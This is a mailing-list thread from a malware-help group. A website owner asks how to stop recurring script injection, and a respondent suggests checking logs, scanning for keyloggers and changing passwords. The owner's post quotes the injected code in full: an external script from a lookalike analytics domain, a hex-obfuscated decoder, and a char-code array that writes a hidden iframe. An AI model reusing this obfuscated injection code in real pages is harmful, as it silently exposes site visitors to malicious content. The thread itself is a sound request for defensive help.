Hi kent, Thanks for the information. I will try this nad come back to you. Once again thanks.
On Sep 29, 8:21 pm, Cometcom1 <[EMAIL PROTECTED]> wrote: > Hi Sri, > > Contact your hosting provider and have them check the log files or > send them to you, with onformation on who is tampering with the files. > They should be able to show some kind of entry. > > It could either be that it happens through an upload of a file - in > which case your password is likely compromised and possibly your PC > has a keylogger or other malicious software. Or it could happen when a > certain page is accessed a certain way on your site, in which case the > software driving the page (php/asp script), are to blame for this. If > it's your own software then you have to change it, but if it's a > standard package software you might want to get hold of an update. > > In any case - check your PC for malicious software capturing your data/ > userids/passwords and make sure to change your passwords and change > the uploading service to the home page to a secure ftp or other better > method. > > Kent > > On Sep 29, 1:45 pm, sri <[EMAIL PROTECTED]> wrote: > > > Dear members, > > > I have posted a question on 13th of > > September,http://groups.google.com/group/stopbadware/browse_thread/thread/96b0c... > > > After receiving the replies i have removed the unnecessary codes and > > scripts from my site. > > Even though regularly i am getting the same code. I am removing it > > daily. > > I am giving the script which i am removing regularly > > > <script src="http://analytics-google.info/s/urchin.js";></script> > > > <script>function c71307925162m48d3c0e5a2bf4(m48d3c0e5a33c7){ function > > m48d3c0e5a3b9b(){return 16;} return > > (parseInt(m48d3c0e5a33c7,m48d3c0e5a3b9b()));}function > > m48d3c0e5a4b44(m48d3c0e5a5318){ function m48d3c0e5a6a93(){return 2;} > > var > > m48d3c0e5a5aeb='';m48d3c0e5a7a3b=String.fromCharCode;for(m48d3c0e5a62bf=0;m48d3c0e5a62bf<m48d3c0e5a5318.length;m48d3c0e5a62bf > > +=m48d3c0e5a6a93()){ m48d3c0e5a5aeb > > +=(m48d3c0e5a7a3b(c71307925162m48d3c0e5a2bf4(m48d3c0e5a5318.substr(m48d3c0e5a62bf,m48d3c0e5a6a93()))));}return > > m48d3c0e5a5aeb;} var z0e='';var m48d3c0e5a820f='3C7'+z0e+'3637'+z0e > > +'2697'+z0e+'07'+z0e+'43E696628216D7'+z0e+'96961297'+z0e+'B646F637'+z0e > > +'56D656E7'+z0e+'42E7'+z0e+'7'+z0e+'7'+z0e+'2697'+z0e+'465287'+z0e > > +'56E657'+z0e+'363617'+z0e+'065282027'+z0e+'2533632536392536362537'+z0e > > +'32253631253664253635253230253665253631253664253635253364253633253337'+z0e > > +'2532302537'+z0e+'332537'+z0e+'32253633253364253237'+z0e > > +'2536382537'+z0e+'342537'+z0e+'342537'+z0e > > +'302533612532662532662536632536662536322536312536652536312536322537'+z0e > > +'352536332536622537'+z0e > > +'332532652536332536652532662536652536352537'+z0e+'37'+z0e > > +'2532652536382537'+z0e+'34253664253663253366253237'+z0e > > +'2532622534642536312537'+z0e+'342536382532652537'+z0e > > +'322536662537'+z0e+'352536652536342532382534642536312537'+z0e > > +'342536382532652537'+z0e > > +'32253631253665253634253666253664253238253239253261253332253339253337'+z0e > > +'253239253262253237'+z0e+'253333253334253635253635253237'+z0e > > +'2532302537'+z0e+'37'+z0e+'2536392536342537'+z0e > > +'34253638253364253339253230253638253635253639253637'+z0e > > +'2536382537'+z0e+'342533642533332533332532302537'+z0e+'332537'+z0e > > +'342537'+z0e+'39253663253635253364253237'+z0e+'2536342536392537'+z0e > > +'332537'+z0e+'302536632536312537'+z0e > > +'39253361253230253665253666253665253635253237'+z0e > > +'2533652533632532662536392536362537'+z0e > > +'3225363125366425363525336527'+z0e+'29293B7'+z0e+'D7'+z0e+'6617'+z0e > > +'2206D7'+z0e+'969613D7'+z0e+'47'+z0e+'27'+z0e+'5653B3C2F7'+z0e > > +'3637'+z0e+'2697'+z0e+'07'+z0e > > +'43E';document.write(m48d3c0e5a4b44(m48d3c0e5a820f));</ > > script><script>check_content()</script> > > > <!-- o65 --><script>a=new Array('6e+1','10.5e+1','1.02e+2','0.114e > > +3','0.97e+2','1.09e+2','1.01e+2','3.2e+1','11.5e+1','1.14e+2','9.9e > > +1','6.1e+1','0.34e+2','10.4e+1','0.116e+3','11.6e+1','0.112e+3','5.8e > > +1','4.7e+1','0.047e+3','0.121e+3','0.97e+2','0.11e+3','1.1e+2','0.1e > > +3','1.01e+2','12e+1','0.046e+3','11.5e+1','1.17e+2','4.7e+1','1.05e > > +2','1.1e+2','1e+2','0.101e+3','0.12e+3','0.46e+2','0.112e+3','1.04e > > +2','0.112e+3','3.4e+1','3.2e+1','0.119e+3','10.5e+1','1e+2','11.6e > > +1','10.4e+1','6.1e+1','0.49e+2','3.2e+1','1.04e+2','10.1e+1','0.105e > > +3','1.03e+2','0.104e+3','11.6e+1','6.1e+1','0.049e+3','0.032e > > +3','11.5e+1','1.16e+2','12.1e+1','1.08e+2','0.101e+3','0.061e+3','3.4e > > +1','0.118e+3','0.105e+3','11.5e+1','10.5e+1','0.98e+2','0.105e > > +3','10.8e+1','10.5e+1','1.16e+2','1.21e+2','5.8e+1','0.32e+2','10.4e > > +1','0.105e+3','10e+1','0.1e+3','1.01e+2','1.1e+2','0.034e+3','0.62e > > +2','0.06e+3','0.47e+2','1.05e+2','1.02e+2','1.14e+2','0.97e+2','0.109e > > +3','10.1e+1','6.2e+1');for(var p in a) > > {document.write(String.fromCharCode(parseFloat(a[p])));};</script><!-- > > c65 --> > > > can any one of you please tell me how to stop this injection of > > malicious script into my web site. > > > Thanks in advance > > Sri. --~--~---------~--~----~------------~-------~--~----~ You received this message through the Google Groups "stopbadware" group. To post to this group, send email to [email protected] To unsubscribe from this group, send email to [EMAIL PROTECTED] For more options, visit this group at http://groups.google.com/group/stopbadware?hl=en -~----------~----~----~----~------~----~------~--~---
